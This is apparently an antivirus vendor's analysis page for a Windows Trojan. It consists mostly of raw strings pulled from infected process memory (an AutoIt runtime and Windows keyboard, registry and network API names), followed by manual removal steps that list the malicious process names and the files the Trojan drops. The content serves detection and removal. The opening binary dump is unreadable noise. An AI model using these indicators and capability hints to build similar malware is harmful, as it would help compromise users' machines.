2O#5N$5M$5Y,CT):] @V,De*9S.LO,D],CK,C] AT AN)6N)7N)6N)6N)6N)5N >O,DP ?P)8N BP,CP)7N-JR*:N ?P)6N)7N)7N)7N)7N(7O*7P&6J
2N!5Q!4P)7S*>f,C] C`*=e,DU*Ad,Ea):W*<_)9U,FS)7M)5N*9N)8N*:O)6N,CP AP,EQ @O-JQ-KP >O-HR.KT ?O)7N,CP =O AP*8N)7N)7N)7N*7O)7N
4W(6L(6a%6^,E_*Ab(7Z,E_ Bc*<X,C[*?a*<P,EW)8M,EP)7N =N,CN)8N,CP @O,DP*;N/IY.MR-AW/E_-IO*<O*;M*:N*:N(5N*=O)7N)7N)7N)7N'6L
3Q'9]Ê);j.Gf,Da*>Y,F](<m):_ @_):b D[*;N)5N)5M(4U,FZ @N*?O-HO >N-KO0H`,DQ.OR.PP,FO,BQ C]*:L,EO)9N @P)8L)6N)6N)7N*7O$5K
5X"5d'9_Ë*=h.Gd B`(8c C` D_)9a A])9` E[*;L)7M,CN)6T);W*8L.KT @`,CZ A[.LN/Da-HN,D[.HY ?N*8_->\-B[,?V @P(7`*>N ?O)6N)7N'7P 3H!3I
2T(6M!7^":n);i/Dm(7](9p,E]*=k*?e BZ Bc A_(6U)<c)5K @M*=c*;T-KW,ER)8c-IX0O[.Jc:DO=Je,JV-FP,AU,BR/Be >T)6U*:N*:N)6N)7N 8O 4M
1Z(>`*@e C`*>h,F](=h ?e D])9i(9d)9^*:])8M)6U)7N(9b*;Y,DO(8Z C`.LT*=Q1Ji.MR2La0L[.MV*@d D] B] @M*8V0Gc'4K*9O)8M)7N)7N)7O%5M
5c 4a*7s(7p-?p Cn!:j);i(9l(8[ Ca D_,E`)9Q)7])6V(6X,CW @R,D`.MS*@d.J_1Ld0L^1Lc/LZ1Le.H^ >c.HS.HW*;c,DQ 9U ?L*<Y)6P)7K 8N
3N$4h"Ek%?k0>r.Cj)=e.Gf ?j*7p*?e)<i);l*?W"9[ @T)7T(6Y*Bd DZ,?_,@]2Jg/MX2Kn0L^3Kp.MX2Ji,AZ,@a1Ig-CT*<_.Fc)<V):Y)6S(8\)7M 7N!4O"5R'6M
1W
Kd)<i*?e @c*Bc$8Y =])6a)7Z B_(7U1I^0I^ >f.KY2Lk0L`0L^1Lc0M^/Kc-C`0K_*Ac <^/Eb(:Q0E^*9R)7W)7L*7N
Fd <_ ?`(6\*6b);i.JZ0Gk.Dn3Kn1Ld3Kq3Kp3Kp3Kq3Kr3Lt1Md D^.J] @j0Ii*>\/H`(6a*=U*=Y)6Q*7M&6N
5w 4ao"@u
@t&Lu);o%6o%;q'9p(6o*G^*<j*C_'5`'<f%7i*@e,Da.Cm3Lm.J\4Lq3Kp3Kp3Kp3Kp3Kp3Kp3Lq,?o3Ln/En.Bp/K_1Ho/Ec*?V ?c(6Y)7O*7Q(7N
Lb&;Y ;r.Cm,G\-Bi2Hq1Fp3Kp3Kp3Kp3Kp3Kp3Kp3Kp3Kn1N]2Jr ?i0Gm*<d.J_):n*;R(8g)7U*8_!4M!4P
:]'4])8n)6d(:h1Kg0Er1Ip.Bo4Lp3Kp3Kp3Kp3Kp3Kp3Kp2Jp/Dq0Eq.Gc3Mi0C`3Jv ;g*?\,E_)7O(7X-9M
Bv'8q*;i$=k&5g'7l!:`*?c.At0Gp1Hp.Bo4Lp3Kp3Kp3Kp3Jp3Ip3Kp3Jp/Dp5Np/Dq0Gq.Do0Jb-Eh);k*>g(8c*8W"5M
Dv*7n'9n&8n);h'[email protected])?e D^):c)7S 8L
9m,C_$=m$=l1Fp1Gp2Ip0Gp3Lp3Kq3Q}3Po4To3Jp2Jp,@o4Lp4Lp0Ep1Hp*<o0Eq.Ei'8l,<](8b*8S
Lc)4q->q3Kp.Bo0Gp/Co4Lp3Kp3Il3Io3Hp3Kp3Kp3Kp1Gp1Gp.Bo2Jp1Ip1Ho/Cs D_.Bf(7e*8V
5]l4Xo3Ip3Kp3Kp3Kp1Hp3Jp0Fp.Co3Jp ?i =\.Ce(6P'6Q
5q%9q%;q)7n(8o%6p(8o'7o ;o,>o4Mp2Ip2Ip3Kp3Kq3Kq3Kn3Lp3Kp4Lp/Dp.Co4Mp,?o3Kp1Hp2Jp1Hq ;j ;_(7b*7J%6N
>v 6q"6p!6p%5o"?t&9p"6p$7p$6p ?u0Jq.Bo5Np/Do1Hp3Ko3Ox3Py4T
[email protected]*A_*?])6b 4U
5q)8o(8o-Eq,@o5Mp-Bo1Gp3Ko3Nu3Nv3Il3Kp4Lp/Dp-Bo4Lp2Ip-Bo/[email protected](9k*7U$6N
6q'8o*8n0Fp6Mo/Bn G}3Lr3Im4R}3Pz3Jn3Kp4Lp0Eo,?o2Ip,@o1Gp/Do1Hp-Aq.Dm*=`)6P 5M
6q&7o-;n)Lt,Lr/K|3Lr3Jn4S~3Pz3Jn3Kp3Lp0Fp,@o2Ip-@o1Hp/Do1Hp.Ap.Dm*=^(7b
3r!6p&7p%9q Hv0Kq/Kr4Jn,?o3Kn3Ox3Nu3Ko3Kp4Mp,>o,@p3Kp.Cp/Do1Ip2Ip/Fq*;g(6])7]#6P
2Jo3Ko4Lo2Ip,?o*<o0Ep =o5Np >o3Jp.Bp(6b*7M
2Jr2Kr0Lx.Cn.Cp*<o1Hp(9o0Dp >o2Hp <r(7m)7\(7P
=s'Js-E}0Ku(A|6Lj.J{1Kt.J|0Jv-J~6On ;o(9o2Jp*;o0Dp*<o2Jq,?j)6[(8b(8R
6,{6.|4(~3#
,J~0Jv1Js.Jz4Lp0En0Ep =o):o3Lp*<o/Cp0Hp-@p,?l)6^)7O(8N
4p,>p.Jq'I
(>x(7m*<o.Ap&6o1Hp <o.Cr(6b(8b%6T
1Ks0Lx0Cl/Bm)9o*:o*;o'6o.Ap);o =p(7k)8P
3o.Du(E
3Lr,Bt'<w(8q'7o*;o);o >o.Cp*<o-@s(7c*7O
.Hx(A{$A
,Ez.Hy J
-Du.Fw)=s&>|%7p#6p)8o(8o(8o(8o(8r*8T
-K}&G
%6s%6u'7r)8o(8o'6o(6p
QGxG=zI?xD;u<4p3 q1(q0%s*
F=}8.wC:
5 |5,~5,
5 |5,~5 {-
6 v1%x0
7-~5,|5,
Z%%U(&O
s- r5/q4,r5-l0%c 
>3v6-t4 r0%d(
8-x7.yB8~3*|@7
Gv*@o.Ls Lw*Mt
0Ix)Lu Lw2Lr.Ok/Jo.Nk.Is/Jr
4g"6no(6t
!4 "6 !3
#5!#8#'6 !/
HHHsssHHH]]]
88{88{88{88{88{\\
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
<assemblyIdentity type="win32" name="Microsoft.VC90.CRT" version="9.0.21022.8" processorArchitecture="x86" publicKeyToken="1fc8b3b9a1e18e3b"></assemblyIdentity>
<assemblyIdentity type="win32" name="Microsoft.VC90.MFC" version="9.0.21022.8" processorArchitecture="x86" publicKeyToken="1fc8b3b9a1e18e3b"></assemblyIdentity>
1.130303.393
{8856F961-340A-11D0-A96B-00C04FD705A2}

MainProX.exe_600:

`.rsrc
\.ptx|x
PSSSSSSh
Gt.Ht$
PSSSh@
PVSSh@
f;Crt
?#%X.y
GetProcessWindowStation
operator
This is a compiled AutoIt script. AV researchers please email [email protected] for support.
kernel32.dll
oleaut32.dll
RegDeleteKeyExW
advapi32.dll
Error text not found (please report)
operand of unlimited repeat could match the empty string
POSIX named classes are supported only within a class
erroffset passed as NULL
POSIX collating elements are not supported
this version of PCRE is compiled without UTF support
PCRE does not support \L, \l, \N{name}, \U, or \u
support for \P, \p, and \X has not been compiled
this version of PCRE is not compiled with Unicode property support
\N is not supported in a class
zcÁ
.zV:b 
GetProcessHeap
CreatePipe
GetWindowsDirectoryW
GetCPInfo
RegDeleteKeyW
RegEnumKeyExW
RegCreateKeyExW
RegOpenKeyExW
RegCloseKey
SetViewportOrgEx
ShellExecuteExW
SHFileOperationW
ShellExecuteW
RegisterHotKey
GetKeyboardLayoutNameW
ExitWindowsEx
EnumThreadWindows
UnregisterHotKey
keybd_event
GetAsyncKeyState
SetKeyboardState
GetKeyboardState
GetKeyState
VkKeyScanW
EnumWindows
EnumChildWindows
MapVirtualKeyW
CloseWindowStation
SetProcessWindowStation
OpenWindowStationW
InternetCrackUrlW
HttpQueryInfoW
HttpOpenRequestW
HttpSendRequestW
FtpOpenFileW
FtpGetFileSize
InternetOpenUrlW
##@,&,//,))
.jQE2
4`%ud*
3(-,'')-*/%' 
9(***3).**-)'
H%d=j@
0!;....(
.text
`.rdata
@.data
.rsrc
@.reloc
p21jj(%fo0.Kl,(Eq32]d
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
KERNEL32.DLL
ADVAPI32.dll
COMCTL32.dll
COMDLG32.dll
GDI32.dll
IPHLPAPI.DLL
MPR.dll
ole32.dll
OLEAUT32.dll
PSAPI.DLL
SHELL32.dll
USER32.dll
USERENV.dll
UxTheme.dll
VERSION.dll
WININET.dll
WINMM.dll
WSOCK32.dll
mscoree.dll
combase.dll
- CRT not initialized
- Attempt to initialize the CRT more than once.
- floating point support not loaded
USER32.DLL
>>>AUTOIT NO CMDEXECUTE<<<
CMDLINERAW
CMDLINE
/AutoIt3ExecuteLine
/AutoIt3ExecuteScript
APPSKEY
789:;<=>?
FTPSETPROXY
GUICTRLRECVMSG
GUICTRLSENDMSG
GUIGETMSG
GUIREGISTERMSG
HOTKEYSET
HTTPSETPROXY
HTTPSETUSERAGENT
ISKEYWORD
MSGBOX
REGENUMKEY
SHELLEXECUTE
SHELLEXECUTEWAIT
TCPACCEPT
TCPCLOSESOCKET
TCPCONNECT
TCPLISTEN
TCPNAMETOIP
TCPRECV
TCPSEND
TCPSHUTDOWN
TCPSTARTUP
TRAYGETMSG
UDPBIND
UDPCLOSESOCKET
UDPOPEN
UDPRECV
UDPSEND
UDPSHUTDOWN
UDPSTARTUP
SendKeyDelay
SendKeyDownDelay
TCPTimeout
WINDOWSDIR
AUTOITEXE
HOTKEYPRESSED
D%s (%d) : ==> %s.:
Line %d:
Line %d (File "%s"):
%s (%d) : ==> %s:
AutoIt script files (*.au3, *.a3x)
*.au3;*.a3x
All files (*.*)
04090000
%u.%u.%u.%u
0.0.0.0
Mddddd
"%s" (%d) : ==> %s:
\??\%s
GUI_RUNDEFMSG
AUTOITCALLVARIABLE%d
255.255.255.255
Keyword
AUTOIT.ERROR
Null Object assignment in FOR..IN loop
Incorrect Object type in FOR..IN loop
3, 3, 9, 21
HKEY_LOCAL_MACHINE
HKEY_CLASSES_ROOT
HKEY_CURRENT_CONFIG
HKEY_CURRENT_USER
HKEY_USERS
%d/d/d
c:\windows\jwxf\MainProX.exe
%WinDir%\jwxf\MainProX.exe
AutoIt supports the __stdcall (WINAPI) and __cdecl calling conventions. The __stdcall (WINAPI) convention is used by default but __cdecl can be used instead. See the DllCall() documentation for details on changing the calling convention.
Missing operator in expression."Unbalanced brackets in expression.
Error parsing function call.0Incorrect number of parameters in function call.'"ReDim" used without an array variable.>Illegal text at the end of statement (one statement per line).1"If" statement has no matching "EndIf" statement.1"Else" statement with no matching "If" statement.2"EndIf" statement with no matching "If" statement.7Too many "Else" statements for matching "If" statement.3"While" statement has no matching "Wend" statement.4"Wend" statement with no matching "While" statement.%Variable used without being declared.XArray variable has incorrect number of subscripts or subscript dimension range exceeded.#Variable subscript badly formatted.*Subscript used on non-accessible variable.&Too many subscripts used for an array.0Missing subscript dimensions in "Dim" statement.NNo variable given for "Dim", "Local", "Global", "Struct" or "Const" statement.
0Expected a "=" operator in assignment statement.*Invalid keyword at the start of this line.
Invalid element in a DllStruct.*Unknown option or bad parameter specified.&Unable to load the internet libraries./"Struct" statement has no matching "EndStruct".HUnable to open file, the maximum number of open files has been exceeded.K"ContinueLoop" statement with no matching "While", "Do" or "For" statement.
Invalid file filter given.*Expected a variable in user function call.1"Do" statement has no matching "Until" statement.2"Until" statement with no matching "Do" statement.#"For" statement is badly formatted.2"Next" statement with no matching "For" statement.N"ExitLoop/ContinueLoop" statements only valid from inside a For/Do/While loop.1"For" statement has no matching "Next" statement.@"Case" statement with no matching "Select"or "Switch" statement.:"EndSelect" statement with no matching "Select" statement.ORecursion level has been exceeded - AutoIt will quit to prevent stack overflow.&Cannot make existing variables static.4Cannot make static variables into regular variables.
3This keyword cannot be used after a "Then" keyword.>"Select" statement is missing "EndSelect" or "Case" statement. "If" statements must have a "Then" keyword. Badly formated Struct statement."Cannot assign values to constants..Cannot make existing variables into constants.9Only Object-type variables allowed in a "With" statement.v"long_ptr", "int_ptr" and "short_ptr" DllCall() types have been deprecated. Use "long*", "int*" and "short*" instead.-Object referenced outside a "With" statement.)Nested "With" statements are not allowed."Variable must be of type "Object".1The requested action with this object has failed.8Variable appears more than once in function declaration.2ReDim array can not be initialized in this manner.1An array variable can not be used in this manner.
Can not redeclare a constant.5Can not redeclare a parameter inside a user function.HCan pass constants by reference only to parameters with "Const" keyword.*Can not initialize a variable with itself.$Incorrect way to use this parameter.:"EndSwitch" statement with no matching "Switch" statement.>"Switch" statement is missing "EndSwitch" or "Case" statement.H"ContinueCase" statement with no matching "Select"or "Switch" statement.
String missing closing quote.!Badly formated variable or macro.*Missing separator character after keyword.

MainProX.exe_600_rwx_00401000_000DF000:

PSSSSSSh
Gt.Ht$
PSSSh@
PVSSh@
f;Crt
?#%X.y
GetProcessWindowStation
operator
This is a compiled AutoIt script. AV researchers please email [email protected] for support.
kernel32.dll
oleaut32.dll
RegDeleteKeyExW
advapi32.dll
Error text not found (please report)
operand of unlimited repeat could match the empty string
POSIX named classes are supported only within a class
erroffset passed as NULL
POSIX collating elements are not supported
this version of PCRE is compiled without UTF support
PCRE does not support \L, \l, \N{name}, \U, or \u
support for \P, \p, and \X has not been compiled
this version of PCRE is not compiled with Unicode property support
\N is not supported in a class
zcÁ
.zV:b 
GetProcessHeap
CreatePipe
GetWindowsDirectoryW
GetCPInfo
RegDeleteKeyW
RegEnumKeyExW
RegCreateKeyExW
RegOpenKeyExW
RegCloseKey
SetViewportOrgEx
ShellExecuteExW
SHFileOperationW
ShellExecuteW
RegisterHotKey
GetKeyboardLayoutNameW
ExitWindowsEx
EnumThreadWindows
UnregisterHotKey
keybd_event
GetAsyncKeyState
SetKeyboardState
GetKeyboardState
GetKeyState
VkKeyScanW
EnumWindows
EnumChildWindows
MapVirtualKeyW
CloseWindowStation
SetProcessWindowStation
OpenWindowStationW
InternetCrackUrlW
HttpQueryInfoW
HttpOpenRequestW
HttpSendRequestW
FtpOpenFileW
FtpGetFileSize
InternetOpenUrlW
##@,&,//,))
.jQE2
4`%ud*
3(-,'')-*/%' 
9(***3).**-)'
H%d=j@
0!;....(
.text
`.rdata
@.data
.rsrc
@.reloc
mscoree.dll
combase.dll
- CRT not initialized
- Attempt to initialize the CRT more than once.
- floating point support not loaded
USER32.DLL
>>>AUTOIT NO CMDEXECUTE<<<
CMDLINERAW
CMDLINE
/AutoIt3ExecuteLine
/AutoIt3ExecuteScript
APPSKEY
789:;<=>?
FTPSETPROXY
GUICTRLRECVMSG
GUICTRLSENDMSG
GUIGETMSG
GUIREGISTERMSG
HOTKEYSET
HTTPSETPROXY
HTTPSETUSERAGENT
ISKEYWORD
MSGBOX
REGENUMKEY
SHELLEXECUTE
SHELLEXECUTEWAIT
TCPACCEPT
TCPCLOSESOCKET
TCPCONNECT
TCPLISTEN
TCPNAMETOIP
TCPRECV
TCPSEND
TCPSHUTDOWN
TCPSTARTUP
TRAYGETMSG
UDPBIND
UDPCLOSESOCKET
UDPOPEN
UDPRECV
UDPSEND
UDPSHUTDOWN
UDPSTARTUP
SendKeyDelay
SendKeyDownDelay
TCPTimeout
WINDOWSDIR
AUTOITEXE
HOTKEYPRESSED
D%s (%d) : ==> %s.:
Line %d:
Line %d (File "%s"):
%s (%d) : ==> %s:
AutoIt script files (*.au3, *.a3x)
*.au3;*.a3x
All files (*.*)
04090000
%u.%u.%u.%u
0.0.0.0
Mddddd
"%s" (%d) : ==> %s:
\??\%s
GUI_RUNDEFMSG
AUTOITCALLVARIABLE%d
255.255.255.255
Keyword
AUTOIT.ERROR
Null Object assignment in FOR..IN loop
Incorrect Object type in FOR..IN loop
3, 3, 9, 21
HKEY_LOCAL_MACHINE
HKEY_CLASSES_ROOT
HKEY_CURRENT_CONFIG
HKEY_CURRENT_USER
HKEY_USERS
%d/d/d
c:\windows\jwxf\MainProX.exe
%WinDir%\jwxf\MainProX.exe
AutoIt supports the __stdcall (WINAPI) and __cdecl calling conventions. The __stdcall (WINAPI) convention is used by default but __cdecl can be used instead. See the DllCall() documentation for details on changing the calling convention.
Missing operator in expression."Unbalanced brackets in expression.
Error parsing function call.0Incorrect number of parameters in function call.'"ReDim" used without an array variable.>Illegal text at the end of statement (one statement per line).1"If" statement has no matching "EndIf" statement.1"Else" statement with no matching "If" statement.2"EndIf" statement with no matching "If" statement.7Too many "Else" statements for matching "If" statement.3"While" statement has no matching "Wend" statement.4"Wend" statement with no matching "While" statement.%Variable used without being declared.XArray variable has incorrect number of subscripts or subscript dimension range exceeded.#Variable subscript badly formatted.*Subscript used on non-accessible variable.&Too many subscripts used for an array.0Missing subscript dimensions in "Dim" statement.NNo variable given for "Dim", "Local", "Global", "Struct" or "Const" statement.
0Expected a "=" operator in assignment statement.*Invalid keyword at the start of this line.
Invalid element in a DllStruct.*Unknown option or bad parameter specified.&Unable to load the internet libraries./"Struct" statement has no matching "EndStruct".HUnable to open file, the maximum number of open files has been exceeded.K"ContinueLoop" statement with no matching "While", "Do" or "For" statement.
Invalid file filter given.*Expected a variable in user function call.1"Do" statement has no matching "Until" statement.2"Until" statement with no matching "Do" statement.#"For" statement is badly formatted.2"Next" statement with no matching "For" statement.N"ExitLoop/ContinueLoop" statements only valid from inside a For/Do/While loop.1"For" statement has no matching "Next" statement.@"Case" statement with no matching "Select"or "Switch" statement.:"EndSelect" statement with no matching "Select" statement.ORecursion level has been exceeded - AutoIt will quit to prevent stack overflow.&Cannot make existing variables static.4Cannot make static variables into regular variables.
3This keyword cannot be used after a "Then" keyword.>"Select" statement is missing "EndSelect" or "Case" statement. "If" statements must have a "Then" keyword. Badly formated Struct statement."Cannot assign values to constants..Cannot make existing variables into constants.9Only Object-type variables allowed in a "With" statement.v"long_ptr", "int_ptr" and "short_ptr" DllCall() types have been deprecated. Use "long*", "int*" and "short*" instead.-Object referenced outside a "With" statement.)Nested "With" statements are not allowed."Variable must be of type "Object".1The requested action with this object has failed.8Variable appears more than once in function declaration.2ReDim array can not be initialized in this manner.1An array variable can not be used in this manner.
Can not redeclare a constant.5Can not redeclare a parameter inside a user function.HCan pass constants by reference only to parameters with "Const" keyword.*Can not initialize a variable with itself.$Incorrect way to use this parameter.:"EndSwitch" statement with no matching "Switch" statement.>"Switch" statement is missing "EndSwitch" or "Case" statement.H"ContinueCase" statement with no matching "Select"or "Switch" statement.
String missing closing quote.!Badly formated variable or macro.*Missing separator character after keyword.

Explorer.EXE_880_rwx_014E0000_00004000:

c:\windows\jwxf\YP.exe
wmsvcrt
WinExec
ShellExecuteExA
ShellExecuteExW
OpenWindowStationA
OpenWindowStationW
SetProcessWindowStation
GetProcessWindowStation
CloseWindowStation
EnumWindows
EnumThreadWindows
EnumChildWindows
RegOpenKeyExA
RegOpenKeyExW
RegEnumKeyExA
RegEnumKeyExW
RegDeleteKeyA
RegDeleteKeyW
RegCloseKey
HttpOpenRequestA
HttpOpenRequestW
HttpEndRequestA
HttpEndRequestW
HttpQueryInfoA
HttpQueryInfoW
UrlUnescapeA
UrlUnescapeW


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Scan a system with an anti-rootkit tool.
  2. Terminate malicious process(es) (How to End a Process With the Task Manager):

    nvsvc32.exe:2604
    MainPro.exe:604
    desk.exe:3840
    ndis500.exe:2464
    ping.exe:496
    ping.exe:1388
    YP.exe:1236
    ndsqp.exe:2428
    %original file name%.exe:1532
    lgsoyx.exe:3824
    shock.exe:3848

  3. Delete the original Trojan file.
  4. Delete or disinfect the following files created/modified by the Trojan:

    %System%\clk.ini (82 bytes)
    %WinDir%\run.bat (196 bytes)
    %WinDir%\c4ud.dll (1753 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KHIRGNID\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SXUVKHUF\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\EL03V57J\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O6JANU0T\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SXUVKHUF\190[1].ico (5930 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\EL03V57J\178[1].ico (3595 bytes)
    %WinDir%\Ymb\deskico\cfg.ini (275 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O6JANU0T\184[1].ico (6341 bytes)
    %Documents and Settings%\%current user%\Desktop\»ð±¬ÓÎÏ·.lnk (1 bytes)
    %Documents and Settings%\%current user%\Desktop\ÆåÅÆ´óÌü.lnk (1 bytes)
    %WinDir%\Ymb\deskico\184.ico (5882 bytes)
    %WinDir%\Ymb\deskico\178.ico (2390 bytes)
    %Documents and Settings%\%current user%\Desktop\´«Ææ°ÔÒµ.lnk (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KHIRGNID\cfg[1].ini (275 bytes)
    %WinDir%\Ymb\deskico\190.ico (5882 bytes)
    %System%\drivers\uniconfi.dat (4447 bytes)
    %WinDir%\Ymb\sys32\ndisweb.log (491 bytes)
    %System%\drivers\ZWebNds.sys (16 bytes)
    %WinDir%\Ymb\sys32\ndisweb_new.dat1 (180 bytes)
    %WinDir%\Ymb\sys32\ndisweb_new.dat0 (8 bytes)
    %WinDir%\Ymb\sys32\shock.exe (1493 bytes)
    %System%\tl.dat (8 bytes)
    %System%\bc.dat (1784 bytes)
    %System%\tl.txt (388 bytes)
    %System%\safe.dat (3780 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\hfftcbc.txt (601 bytes)
    %WinDir%\Ymb\sys32\shock.txt (36452 bytes)
    %WinDir%\Ymb\sys32\ndis500.txt (43108 bytes)
    %WinDir%\Ymb\sys32\tray.txt (144098 bytes)
    %WinDir%\Ymb\wow64\nvsvc32.txt (132327 bytes)
    %WinDir%\Ymb\wow64\nvsvc32.exe (7715 bytes)
    %WinDir%\Ymb\sys32\ndis500.exe (250 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\vcnpoku.txt (1425 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\suqpotb.txt (2321 bytes)
    %System%\bc.txt (85868 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\qxoxvnm.txt (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\ognbetd.txt (7345 bytes)
    %WinDir%\Ymb\sys32\ndsqp.exe (75 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\sgotxct.txt (7547 bytes)
    %WinDir%\Ymb\sys32\urlnav.txt (14076 bytes)
    %WinDir%\Ymb\First.txt (18796 bytes)
    %WinDir%\Ymb\sys32\ndsqp.txt (12588 bytes)
    %WinDir%\Ymb\sys32\urlnav.dll (83 bytes)
    %WinDir%\Ymb\lgsoyx.exe (110 bytes)
    %WinDir%\Ymb\deskico\desk.exe (299 bytes)
    %WinDir%\Ymb\deskico\desk.txt (50796 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\mopdaqf.txt (4545 bytes)
    %System%\safe.txt (122772 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\tmifumt.txt (2105 bytes)
    %WinDir%\Ymb\flist.bin (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\gktmoij.txt (11 bytes)
    %System%\drivers\HideSys.sys (15 bytes)
    %System%\appmon.txt (63836 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\wohbhrb.txt (673 bytes)
    %WinDir%\jwxf\start.bat (99 bytes)
    %WinDir%\jwxf\yp.exe (5033 bytes)
    %WinDir%\jwxf\MainProX.exe (1660 bytes)
    %WinDir%\jwxf\userip.ipb (936 bytes)
    %WinDir%\jwxf\MainPro.exe (18513 bytes)
    %WinDir%\Ymb\sys32\shock.dll (931 bytes)

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2026 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now